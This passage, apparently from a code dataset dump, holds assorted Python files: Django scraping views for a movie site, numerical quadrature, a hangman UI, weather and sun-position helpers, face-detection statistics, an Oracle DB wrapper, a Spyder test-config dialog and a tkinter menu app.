in Crores)\": sheet.cell_value(row_bnk, 3) + (sheet.cell_value(row_dfi, 3) if(row_dfi != None) else 0),\n },\n }\n # print(data)\n\n with open(directory+'/'+fileName+'.json', 'w') as f:\n json.dump(data, f)\n","sub_path":"fetcher_dir/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":11864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"305346521","text":"import requests\nfrom django.http import JsonResponse\n\n\n# Create your views here.\n\n\n# 正在热映\ndef get_movieOnInfoList(request):\n url = 'http://m.maoyan.com/ajax/movieOnInfoList?token='\n headers = {\n 'Referer': 'http://m.maoyan.com',\n 'User-Agent': 'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Mobile Safari/537.36'\n }\n\n res = requests.get(url, headers=headers).json()\n return JsonResponse(res)\n\n\n# 即将热映\ndef get_comingList(request):\n url = 'http://m.maoyan.com/ajax/comingList?ci=73&token=&limit=10'\n headers = {\n 'Referer': 'http://m.maoyan.com',\n 'User-Agent': 'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Mobile Safari/537.36'\n }\n\n res = requests.get(url, headers=headers).json()\n return JsonResponse(res)\n\n\n# 获取影城信息\ndef get_cinemaList(request):\n url = 'http://m.maoyan.com/ajax/cinemaList?day=2019-10-31&offset=0&limit=20&districtId=-1&lineId=-1&hallType=-1&brandId=-1&serviceId=-1&areaId=-1&stationId=-1&item=&updateShowDay=true&reqId=1572519440844&cityId=73'\n headers = {\n 'Referer': 'http://m.maoyan.com',\n 'User-Agent': 'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Mobile Safari/537.36'\n }\n\n res = requests.get(url, headers=headers).json()\n return JsonResponse(res)\n\n# print(get_movieOnInfoList())\n#\n# print('*'*100)\n# print(get_comingList())\n# print('*'*100)\n# print(get_cinemaList())\n","sub_path":"maoyan(vue+django)/maoyan-Django/maoyan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"238613639","text":"#!/usr/bin/python\nimport PolyMethod as polmeth\nimport IndexSets as isets\nimport numpy as np\n\n\"\"\" \n Tensor and sparse grid integration points and weights\n\"\"\"\ndef SparseGrid(Parameters, level, growth_rule):\n \n # Get the sparse indices\n dimensions = len(Parameters)\n sparse_index, a , sg_set = isets.sparse_grid_index_set(dimensions, level, growth_rule)\n \n # Compute the corresponding Gauss quadrature points and weights\n rows = len(sparse_index)\n \n # Get this into an array\n orders = np.zeros((rows, dimensions))\n points_store = []\n weights_store = []\n \n \n # Ok, now we have to correct for the weights, depending on the right and left\n # bounds of the individual parameters. 
I'm hardcoding this for Legendre for\n # the moment!\n factor = 0\n for k in range(0, dimensions):\n factor = (Parameters[k].upper_bound - Parameters[k].lower_bound) + factor\n \n \n for i in range(0, rows):\n \n # loop through the dimensions\n for j in range(0, dimensions):\n orders[i,j] = np.array(sparse_index[i][j])\n \n # points and weights for each order~\n points, weights = polmeth.getGaussianQuadrature(Parameters, orders[i,:])\n \n # Multiply weights by constant 'a':\n weights = factor * weights * a[i]\n \n # Now store point sets ---> scratch this, use append instead!!!!\n for k in range(0, len(points)):\n #print points[k,:]\n points_store = np.append(points_store, points[k,:], axis=0)\n weights_store = np.append(weights_store, weights[k])\n \n dims1 = int( len(points_store) / dimensions )\n points_store = np.reshape(points_store, ( dims1, dimensions ) ) \n \n return points_store, weights_store\n \ndef TensorGrid(Parameters, orders):\n \n # Call the gaussian quadrature routine\n points, weights = polmeth.getGaussianQuadrature(Parameters, orders)\n \n # Get the weight factor:\n dimensions = len(Parameters)\n factor = 0\n for k in range(0, dimensions):\n factor = (Parameters[k].upper_bound - Parameters[k].lower_bound) + factor\n \n # Multiply by the factor\n weights = weights * factor\n \n return points, weights","sub_path":"codes/Integration.py","file_name":"Integration.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"527597465","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('hatch', '0006_anchor_scraped'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='anchor',\n name='ip',\n field=models.GenericIPAddressField(default='127.0.0.1'),\n ),\n ]\n","sub_path":"neuron_django/hatch/migrations/0007_anchor_ip.py","file_name":"0007_anchor_ip.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"25666014","text":"\"\"\"\n @author: Matko Gabriel\n @email: ytgabi98@gmail.com\n @date: 1/30/2018 11:37\n\"\"\"\nclass UI(object):\n\n @staticmethod\n def printMenu(*args):\n \"\"\"\n Prints the menu of the application\n \"\"\"\n print(\"\\033[96mAvailable commands:\\033[0m\")\n print(\"\\033[91m add \\033[93m<sentence>\\033[0m\")\n print(\"\\033[91m start\\033[0m\")\n print(\"\\033[91m exit\\033[0m\")\n print(\"\\033[91m help\\033[0m\")\n\n\n @staticmethod\n def getCommand():\n \"\"\"\n Reads a command and it's arguments from console\n :return: a tuple with the command and it's arguments\n example : (\"add\", [\"sentence\", \"for\", \"hangman\"])\n Raises Exception when the command does not exist\n or the arguments are bad\n or the words of the sentences have less than 3 characters\n \"\"\"\n cmd = input(\"\\033[32m>>> \\033[0m\").lower()\n\n cmd = cmd.split()\n\n if cmd[0] not in [\"add\", \"start\", \"exit\", \"help\"]:\n raise Exception(\"Command error!\")\n\n\n if cmd[0] == \"add\" and cmd[1:] == []:\n raise Exception(\"Argument error!\")\n\n if cmd[0] == \"add\":\n for el in cmd[1:]:\n if len(el) < 3:\n raise Exception(\"Invalid input. 
Words need to have at least 3 characters!\\n The bad word is '\" + el + \"'.\")\n\n return cmd[0], cmd[1:]\n\n @staticmethod\n def printException(ex):\n \"\"\"\n Prints an exception with format\n :param ex: exception to be printed\n :return: nothing\n \"\"\"\n print(\"\\n \\033[91m\", ex, \"\\033[0m\\n\")\n\n @staticmethod\n def getChar():\n \"\"\"\n Reads a character from the console for the hangman game\n :return: the character introduced by the user\n Raises ValueError when user introduces more than 1 characters\n or when the input is not a character\n \"\"\"\n char = input(\"\\033[32m>>> \\033[0m\").lower()\n if len(char) != 1:\n raise ValueError(\"You should insert only a character at a time!\")\n\n if not char.isalpha():\n raise ValueError(\"Please introduce a character!\")\n\n return char\n","sub_path":"FinalExam/ui/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"360810631","text":"import datetime\nimport string\nimport time\n\nimport astral\nimport pywapi\n\nimport config\n\nclass SimpleWeather(object):\n def __init__(self):\n self.celcius = None\n self.is_sunny = 0\n self.is_rainy = 0\n self.is_foggy = 0\n self.is_cloudy = 0\n self.lightning = 0\n self.is_snowy = 0\n\n'''\nMostly Cloudy\nPartly Cloudy\nOvercast\nFair\nFog/Mist\nA Few Clouds\nLight Rain\nHaze\nDrizzle\nBreezy\nLight Snow\nUnknown Precip\n'''\ndef parse_weather_modifier(modifier):\n if modifier in ['very', 'mostly', 'high', 'heavy']:\n return 0.75\n elif modifier in ['partly', 'little', 'light', 'low']:\n return 0.25\n else:\n return 0.5\n\n\ndef parse_weather(weather_str):\n weather = SimpleWeather()\n weather_str_list = weather_str.lower().replace('/', ' ').split()\n last_word = None\n for word in weather_str_list:\n if 'sun' in word or word == 'fair':\n weather.is_sunny = parse_weather_modifier(last_word)\n elif 'cloud' in word:\n weather.is_cloudy = parse_weather_modifier(last_word)\n elif word == 'overcast':\n weather.is_cloudy = min(parse_weather_modifier(last_word) * 1.25, 1.0)\n elif 'rain' in word:\n weather.is_rainy = parse_weather_modifier(last_word)\n elif 'fog' in word or 'mist' in word:\n weather.is_foggy = parse_weather_modifier(last_word)\n elif 'snow' in word:\n weather.is_snowy = parse_weather_modifier(last_word)\n last_word = word\n return weather\n\ndef get_weather(location_id='KSJC', weather_source='noaa'):\n if config.config['debug']:\n current_weather = parse_weather('cloudy rainy')\n current_weather.celcius = 30.0\n return current_weather\n\n if weather_source == 'noaa':\n noaa_result = pywapi.get_weather_from_noaa(location_id)\n current_weather = parse_weather(string.lower(noaa_result['weather']))\n current_weather.celcius = float(noaa_result['temp_c'])\n elif weather_source == 'yahoo':\n yahoo_result = pywapi.get_weather_from_yahoo(location_id)\n current_weather = parse_weather(string.lower(yahoo_result['condition']['text']))\n current_weather.celcius = float(yahoo_result['condition']['temp'])\n elif weather_source == 'weather_com':\n weather_com_result = pywapi.get_weather_from_weather_com(location_id)\n current_weather = parse_weather(string.lower(weather_com_result['current_conditions']['text']))\n current_weather.celcius = float(weather_com_result['current_conditions']['temperature'])\n return current_weather\n\ndef get_seconds(local_time=None):\n if local_time is None:\n local_time = time.localtime()\n seconds = local_time.tm_hour * 3600 + local_time.tm_min * 60 
+ local_time.tm_sec\n    return float(seconds)\n\ndef get_sun_seconds(time):\n    seconds = time.hour * 3600 + time.minute * 60 + time.second\n    return float(seconds)\n\ndef get_sun_position(now=None, sunrise=None, sunset=None):\n    if now is None:\n        now = get_seconds(time.localtime())\n    if sunrise is None:\n        sunrise = get_sun_info()[0]\n    if sunset is None:\n        sunset = get_sun_info()[1]\n    sun_position = (now - sunrise) / (sunset - sunrise)\n    if sun_position < 0 or sun_position > 1:\n        return None\n    else:\n        return sun_position\n\ndef get_moon_position(now=None, sunset=None, sunrise=None):\n    if now is None:\n        now = get_seconds(time.localtime())\n    if sunset is None:\n        sunset = float(get_sun_info()[1])\n    if sunrise is None:\n        sunrise = float(get_sun_info()[0])\n    if now < sunrise:\n        moon_position = (now + (86400 - sunset)) / (sunrise + (86400 - sunset))\n    else:\n        moon_position = (now - sunset) / (sunrise + (86400 - sunset))\n    if moon_position < 0 or moon_position > 1:\n        return None\n    else:\n        return moon_position\n\ndef get_sun_info():\n    sun_info = astral.Astral()\n    location = sun_info['San Francisco']\n    timezone = location.timezone\n    d = datetime.date.today()\n    sun = location.sun(local=True, date=d)\n    sunrise = get_sun_seconds(sun['sunrise'])\n    sunset = get_sun_seconds(sun['sunset'])\n    return float(sunrise), float(sunset)\n\ndef get_moon_info():\n    moonset, moonrise = get_sun_info()\n    return moonrise, moonset\n","sub_path":"server/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"104221973","text":"from PIL import Image, ImageFile\nimport face_recognition\nimport glob\nfrom time import sleep  # needed by the out-of-memory retry loop below\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nphoto_limit = -1 # set -1 for no limit\n\nid_stats_f = open(\"data/identity_face_stats.txt\", \"w\")\n\nidentity_list = glob.glob(\"../dataset/*/*/*\")\n\nphotos_by_faces = {}\nfaces_by_dim = {}\nface_ratios = {}\nidentity_ratios = {}\nidentity_avg_faces = {}\n\nphoto_counter = 0\n\n# Analyze faces per identity\nfor identity in identity_list:\n    if photo_limit != -1 and photo_counter > photo_limit:\n        break\n\n    print(identity)\n    file_list = glob.glob(identity + \"/*.jpg\")\n\n    if len(file_list) == 0:\n        continue\n\n    images_with_faces = 0\n    faces = 0\n\n    # Run face detector on each image for identity\n    for file in file_list:\n        image = face_recognition.load_image_file(file)\n        img_w, img_h, img_dim = image.shape\n\n        mem_c = 0\n        while True:\n            if mem_c == 3:\n                break\n            try:\n                face_locations = face_recognition.face_locations(image, number_of_times_to_upsample=0, model=\"cnn\")\n                break\n            except RuntimeError:\n                sleep(5)\n                print(\"Runtime Error: Out of memory\")\n                mem_c += 1\n        if mem_c == 3:\n            continue\n        else:\n            photo_counter += 1\n\n        # Check multiple faces per image\n        if len(face_locations) > 0:\n            images_with_faces += 1\n            faces += len(face_locations)\n\n            if len(face_locations) not in photos_by_faces:\n                photos_by_faces[len(face_locations)] = 1\n            else:\n                photos_by_faces[len(face_locations)] += 1\n\n            for face_location in face_locations:\n                p1_y, p1_x, p2_y, p2_x = face_location\n                w = abs(int(p1_x - p2_x))\n                h = abs(int(p1_y - p2_y))\n\n                if (w,h) not in faces_by_dim:\n                    faces_by_dim[(w,h)] = 1\n                else:\n                    faces_by_dim[(w,h)] += 1\n\n                face_to_img = (round(1.0 * w / img_w, 2), round(1.0 * h / img_h, 2))\n                if face_to_img not in face_ratios:\n                    face_ratios[face_to_img] = 1\n                else:\n                    face_ratios[face_to_img] += 1\n\n    ratio = round(1.0 * images_with_faces / len(file_list), 2) # fraction of images 
that contain faces\n avg_faces = round(1.0 * faces / len(file_list), 2) # average number of faces per image\n\n if ratio not in identity_ratios:\n identity_ratios[ratio] = 1\n else:\n identity_ratios[ratio] += 1\n\n if avg_faces not in identity_avg_faces:\n identity_avg_faces[avg_faces] = 1\n else:\n identity_avg_faces[avg_faces] += 1\n\n print >> id_stats_f, (identity + \" (\" + str(ratio) + \", \" + str(avg_faces) + \")\")\n\nid_stats_f.close()\n\n# Print collected data\nf = open(\"data/face_results.txt\", \"w\")\nprint >> f, photos_by_faces\nprint >> f, faces_by_dim\nprint >> f, face_ratios\nprint >> f, identity_ratios\nprint >> f, identity_avg_faces\nf.close()","sub_path":"analysis/face_analysis.py","file_name":"face_analysis.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"393226724","text":"import cx_Oracle\nimport logging\n\nlogging_level = logging.DEBUG\nlogging.basicConfig(level=logging_level,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='[%Y-%m-%d %H:%M:%S]')\n\nclass dbtest():\n _connect = None\n _SHOW_SQL = None\n __commit = None\n __SQL = None\n\n def _init(self):\n if self._connect is None:\n self._connect = cx_Oracle.connect('dev/123456@remot/ORCL')\n else:\n raise Exception(\"dbs.__connect only use once, pleas clear and new dbs!\")\n\n def _exec(self, sql):\n pass\n\n def _finish(self):\n self.__SQL = None\n if self._connect and self.__commit:\n self._connect.commit()\n if self._connect:\n self._connect.close()\n\n def call(self, sql):\n self._init()\n try:\n return self._exec(sql)\n except:\n if self.__SQL:\n self._print('[ERROR]'+self.__SQL)\n if self._connect and self.__commit:\n try:\n self._connect.rollback();\n finally:\n pass\n raise\n finally:\n self._finish()\n\n def _print(self, sql):\n logging.debug(\"[\" + self.__class__.__name__ + \" execSQL] \" + sql)\n pass\n\n def _fetchall(self, sql):\n self.__SQL = sql\n cursor = None\n try:\n cursor = self._connect.cursor()\n cursor.execute(self.__SQL)\n return cursor.fetchall()\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n def _fetchone(self, sql):\n self.__SQL = sql\n cursor = None\n try:\n cursor = self._connect.cursor()\n cursor.execute(self.__SQL)\n return cursor.fetchone()\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n def _update(self, sql):\n self.__SQL = sql\n cursor = None\n try:\n cursor = self._connect.cursor()\n cursor.execute(self.__SQL)\n count = cursor.rowcount\n self.__commit = True\n return count\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n def _calldata(self, cursor):\n pass\n def _callproc(self, proc):\n cursor = None\n try:\n cursor = self._connect.cursor()\n data = self._calldata(cursor)\n self.__SQL = proc + str(data)\n cursor.callproc(proc, data)\n for i in range(0, len(data)):\n if isinstance(data[i], cx_Oracle.CURSOR):\n try:\n data[i] = [x for x in data[i].getvalue()]\n except:\n logging.error(\"[\" + self.__class__.__name__ + \" ERROR] OUT Cursor not open in PL/SQL \" + self.__SQL)\n data[i] = []\n pass\n self.__commit = True\n return data\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n\n\n","sub_path":"start/code/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} 
+{"seq_id":"60157426","text":"# -*- coding: utf-8 -*-\nimport os\nimport traceback\nfrom .utils import tprint_error\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom .utils import CrawlerUtil\nfrom .mysql_alchemy import HqSession\n\n# const\nDB_EXCEPTION = -1\n\n\n# databases\nCRAWLER_BOOKING_BASE = declarative_base(name='crawler_booking')\nCRAWLER_DIDA_BASE = declarative_base(name='crawler_dida')\nCRAWLER_QYER_BASE = declarative_base(name='crawler_qyer')\nCRAWLER_MAFENGWO_BASE = declarative_base(name='crawler_mafengwo')\nCRAWLER_META = declarative_base(name='crawler_meta')\nCRAWLER_CTRIP_BASE = declarative_base(name='crawler_ctrip')\n\n\nclass CrawlerBaseDb(object):\n \"\"\"\n Crawler base database\n \"\"\"\n logger = CrawlerUtil.get_crawler_logger()\n\n def __init__(self, db):\n self.db = db\n self.session = None\n self.engine = None\n self.data_dir = CrawlerUtil.get_crawler_data_dir()\n\n def create_all_tables(self, basecls):\n try:\n basecls.metadata.create_all(self.engine)\n self.session.commit()\n return True\n except SQLAlchemyError:\n self.logger.error(traceback.format_exc())\n return False\n\n # only clean dir\n def clean_data_files(self):\n try:\n file_list = os.listdir(self.data_dir)\n for f in file_list:\n file_path = os.path.join(self.data_dir, f)\n if os.path.isfile(file_path):\n pass\n # os.remove(file_path)\n elif os.path.isdir(file_path):\n pass\n # shutil.rmtree(file_path, True)\n return True\n except OSError:\n self.logger(traceback.format_exc())\n return False\n\n @classmethod\n def get_db(cls, db):\n try:\n database = CrawlerBaseDb(db)\n database.session, database.engine = HqSession.get_db_session(db)\n return database\n except SQLAlchemyError:\n tprint_error(traceback.format_exc())\n cls.logger.error(\"fail to create database objects: \\n{error}\\n\"\n .format(error=traceback.format_exc()))\n return None\n\n @classmethod\n def get_wild_session(cls, db):\n return HqSession.get_wild_session(db)\n\n @classmethod\n def close_wild_session(cls, sess):\n HqSession.close_wild_session(sess)\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"crawlers/crawlers/common/mysql_adapter.py","file_name":"mysql_adapter.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"293331846","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © 2013 Spyder Project Contributors\n# Licensed under the terms of the MIT License\n# (see LICENSE.txt for details)\n\"\"\"\nFunctionality for asking the user to specify the test configuration.\n\nThe main entry point is `ask_for_config()`.\n\"\"\"\n\n# Standard library imports\nfrom collections import namedtuple\nimport os.path as osp\n\n# Third party imports\nfrom qtpy.compat import getexistingdirectory\nfrom qtpy.QtWidgets import (QApplication, QDialog, QDialogButtonBox, QGroupBox,\n QHBoxLayout, QLabel, QLineEdit, QPushButton,\n QRadioButton, QVBoxLayout)\nfrom spyder.config.base import get_translation\nfrom spyder.py3compat import getcwd, to_text_string\nfrom spyder.utils import icon_manager as ima\n\ntry:\n _ = get_translation(\"unittest\", dirname=\"spyder_unittest\")\nexcept KeyError as error:\n import gettext\n _ = gettext.gettext\n\nConfig = namedtuple('Config', ['framework', 'wdir'])\nConfig.__new__.__defaults__ = (None, '')\n\n\nclass ConfigDialog(QDialog):\n \"\"\"\n Dialog window for specifying test configuration.\n\n The window contains two radio buttons (for 'py,test' and 'nose'),\n a line 
edit box for specifying the working directory, a button to\n use a file browser for selecting the directory, and OK and Cancel\n buttons. Initially, neither radio button is selected and the OK\n button is disabled. Selecting a radio button enabled the OK\n button.\n \"\"\"\n\n def __init__(self, config, parent=None):\n \"\"\"\n Construct a dialog window.\n\n Parameters\n ----------\n config : Config\n Initial configuration\n parent : QWidget\n \"\"\"\n super(ConfigDialog, self).__init__(parent)\n self.setWindowTitle(_('Configure tests'))\n layout = QVBoxLayout(self)\n\n framework_groupbox = QGroupBox(_('Test framework'), self)\n framework_layout = QVBoxLayout(framework_groupbox)\n self.pytest_button = QRadioButton('py.test', framework_groupbox)\n framework_layout.addWidget(self.pytest_button)\n self.nose_button = QRadioButton('nose', framework_groupbox)\n framework_layout.addWidget(self.nose_button)\n layout.addWidget(framework_groupbox)\n\n layout.addSpacing(10)\n\n wdir_label = QLabel(_('Directory from which to run tests'))\n layout.addWidget(wdir_label)\n wdir_layout = QHBoxLayout()\n self.wdir_lineedit = QLineEdit(self)\n wdir_layout.addWidget(self.wdir_lineedit)\n self.wdir_button = QPushButton(ima.icon('DirOpenIcon'), '', self)\n self.wdir_button.setToolTip(_(\"Select directory\"))\n self.wdir_button.clicked.connect(lambda: self.select_directory())\n wdir_layout.addWidget(self.wdir_button)\n layout.addLayout(wdir_layout)\n\n layout.addSpacing(20)\n\n self.buttons = QDialogButtonBox(QDialogButtonBox.Ok |\n QDialogButtonBox.Cancel)\n layout.addWidget(self.buttons)\n self.buttons.accepted.connect(self.accept)\n self.buttons.rejected.connect(self.reject)\n\n ok_button = self.buttons.button(QDialogButtonBox.Ok)\n ok_button.setEnabled(False)\n self.pytest_button.toggled.connect(lambda: ok_button.setEnabled(True))\n self.nose_button.toggled.connect(lambda: ok_button.setEnabled(True))\n\n if config.framework == 'py.test':\n self.pytest_button.setChecked(True)\n elif config.framework == 'nose':\n self.nose_button.setChecked(True)\n self.wdir_lineedit.setText(config.wdir)\n\n def select_directory(self):\n \"\"\"Display dialog for user to select working directory.\"\"\"\n basedir = to_text_string(self.wdir_lineedit.text())\n if not osp.isdir(basedir):\n basedir = getcwd()\n title = _(\"Select directory\")\n directory = getexistingdirectory(self, title, basedir)\n if directory:\n self.wdir_lineedit.setText(directory)\n\n def get_config(self):\n \"\"\"\n Return the test configuration specified by the user.\n\n Returns\n -------\n Config\n Test configuration\n \"\"\"\n if self.pytest_button.isChecked():\n framework = 'py.test'\n elif self.nose_button.isChecked():\n framework = 'nose'\n else:\n framework = None\n return Config(framework=framework, wdir=self.wdir_lineedit.text())\n\n\ndef ask_for_config(config, parent=None):\n \"\"\"\n Ask user to specify a test configuration.\n\n This is a convenience function which displays a modal dialog window\n of type `ConfigDialog`.\n \"\"\"\n dialog = ConfigDialog(config, parent)\n result = dialog.exec_()\n if result == QDialog.Accepted:\n return dialog.get_config()\n\n\nif __name__ == '__main__':\n app = QApplication([])\n config = Config(framework=None, wdir=getcwd())\n print(ask_for_config(config))\n","sub_path":"spyder_unittest/widgets/configdialog.py","file_name":"configdialog.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117838331","text":"import 
math\n\nf = open(\"inputs/day3.txt\", \"r\")\ninp = list(f.read().split(\"\\n\"))\n\nc = [0] * 5\nfor i in range(1, len(inp)):\n c = [\n sum(x)\n for x in zip(\n [(inp[i][(k * i) % len(inp[i])] == \"#\") for k in [1, 3, 5, 7]] + [0], c\n )\n ]\n if i % 2 == 0:\n if inp[i][(i // 2) % len(inp[i])] == \"#\":\n c[4] += 1\n\nprint(f\"Part 1: {c[1]}\")\nprint(f\"Part 2: {math.prod(c)}\")\n","sub_path":"solutions/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"141577421","text":"\n\nfrom xai.brain.wordbase.nouns._potsherd import _POTSHERD\n\n#calss header\nclass _POTSHERDS(_POTSHERD, ):\n\tdef __init__(self,): \n\t\t_POTSHERD.__init__(self)\n\t\tself.name = \"POTSHERDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"potsherd\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_potsherds.py","file_name":"_potsherds.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"30806345","text":"from application import db\nfrom application.auth.models import User\n\nfrom application.models import Base\n\nfrom sqlalchemy.sql import text\n\nclass Recipe(Base):\n\n header = db.Column(db.String(50), nullable=False)\n category = db.Column(db.String(50), nullable=False)\n\n description = db.Column(db.String(1000), nullable=True)\n directions = db.Column(db.String(10000), nullable=False)\n\n account_id = db.Column(db.Integer, db.ForeignKey('account.id'),\n nullable=False)\n\n def __init__(self, header, category, description, directions):\n self.header = header\n self.category = category\n self.description = description\n self.directions = directions\n \n\n @staticmethod\n def count_my_recipes(user_id):\n stmt = text(\"SELECT COUNT(*) FROM Recipe WHERE account_id = :user_id\").params(user_id=user_id)\n res = db.engine.execute(stmt)\n\n response = []\n\n for row in res:\n response.append(row[0])\n\n return response\n\n\n @staticmethod\n def list_how_many_recipes_per_user():\n stmt = text(\"SELECT Account.name, COUNT(Recipe.account_id) AS amount\"\n \" FROM Account\"\n \" LEFT JOIN Recipe ON Account.id = Recipe.account_id\"\n \" GROUP BY Account.id, Recipe.account_id\"\n \" ORDER BY amount DESC\")\n res = db.engine.execute(stmt)\n\n response = []\n for row in res:\n response.append({\"name\":row[0], \"count\":row[1]})\n\n return response\n \n\nclass RecipeIngredient(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n\n amount = db.Column(db.String(50), nullable=True)\n unit = db.Column(db.String(50), nullable=True)\n\n recipe_id = db.Column(db.Integer, db.ForeignKey('recipe.id'),\n nullable=False)\n\n ingredient_id = db.Column(db.Integer, db.ForeignKey('ingredient.id'),\n nullable=False)\n\n def __init__(self, amount=None, unit=None):\n if amount is None:\n amount = {}\n elif unit is None:\n unit = {}\n else:\n self.amount = amount\n self.unit = unit","sub_path":"application/recipes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"456969628","text":"# Restaurant menu\n# Simple GUI application\n\n\nfrom tkinter import *\n\nclass Menu(Frame):\n def __init__(self, master):\n super(Menu, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n Label(self,\n text = \"SUSHI MENU\"\n ).grid(row = 0, column = 1, sticky 
= W)\n\n self.nigiri = BooleanVar()\n Label(self,\n text = \"Nigiri\"\n ).grid(row = 2, column = 0, sticky = W)\n Label(self,\n text = \"2.45 $\"\n ).grid(row = 2, column = 1, sticky = W)\n\n Checkbutton(self,\n variable = self.nigiri\n ).grid(row = 2, column = 2, sticky = W)\n Label(self,\n text = \"Amount:\"\n ).grid(row = 2, column = 3, sticky = W)\n self.nigiri_amount = Entry(self)\n self.nigiri_amount.grid(row = 2, column = 4, sticky = W)\n\n self.maki = BooleanVar()\n Label(self,\n text = \"Maki\"\n ).grid(row = 3, column = 0, sticky = W)\n Label(self,\n text = \"4.89 $\"\n ).grid(row = 3, column = 1, sticky = W)\n Checkbutton(self,\n variable = self.maki\n ).grid(row = 3, column = 2, sticky = W)\n Label(self,\n text = \"Amount:\"\n ).grid(row = 3, column = 3, sticky = W)\n self.maki_amount = Entry(self)\n self.maki_amount.grid(row = 3, column = 4, sticky = W)\n\n self.futomaki = BooleanVar()\n Label(self,\n text = \"Futomaki\"\n ).grid(row = 4, column = 0, sticky = W)\n Label(self,\n text = \"12.99 $\"\n ).grid(row = 4, column = 1, sticky = W)\n Checkbutton(self,\n variable = self.futomaki\n ).grid(row = 4, column = 2, sticky = W)\n Label(self,\n text = \"Amount:\"\n ).grid(row = 4, column = 3, sticky = W)\n self.futomaki_amount = Entry(self)\n self.futomaki_amount.grid(row = 4, column = 4, sticky = W)\n\n Button(self,\n text = \"Order!\",\n command = self.order,\n ).grid(row = 5, column = 0, sticky = W)\n\n self.yours = Text(self, width = 50, height = 10, wrap = WORD)\n self.yours.grid(row = 6, column = 0, columnspan = 5)\n\n def order(self):\n price = 0\n order = \"\"\n maki = self.maki_amount.get()\n nigiri = self.nigiri_amount.get()\n futomaki = self.futomaki_amount.get()\n if self.nigiri.get():\n price += 2.45 * int(nigiri)\n order += \"nigiri, \"\n if self.maki.get():\n price += 4.89 * int(maki)\n order += \"maki, \"\n if self.futomaki.get():\n price += 12.99 * int(futomaki)\n order += \"futomaki.\"\n\n yours = \"You have ordered: \"\n yours += order\n yours += \"\\nTotal cost: \"\n yours += str(price)\n\n self.yours.delete(0.0, END)\n self.yours.insert(0.0, yours)\n\nroot = Tk()\nroot.title(\"Menu\")\napp = Menu(root)\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n","sub_path":"Python programming for the absolute beginner - Michael Dawson/Chapter 10 - GUI - tkinter/10.3.py","file_name":"10.3.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"247916493","text":"import math\nimport tensorflow as tf \n\nfrom multi_pose.max_heap import MaxHeap\n\ndef scoreIsMaximumInLocalWindow(\n keypointId, score, heatmapY, heatmapX, localMaximumRadius, scores\n ):\n height = scores.shape[0]\n width = scores.shape[1]\n\n localMaximum = True \n yStart = max(heatmapY - localMaximumRadius, 0)\n yEnd = min(heatmapY + localMaximumRadius + 1, height)\n for yCurrent in range(yStart, yEnd):\n xStart = max(heatmapX - localMaximumRadius, 0)\n xEnd = min(heatmapX + localMaximumRadius + 1, width)\n for xCurrent in range(xStart, xEnd):\n if 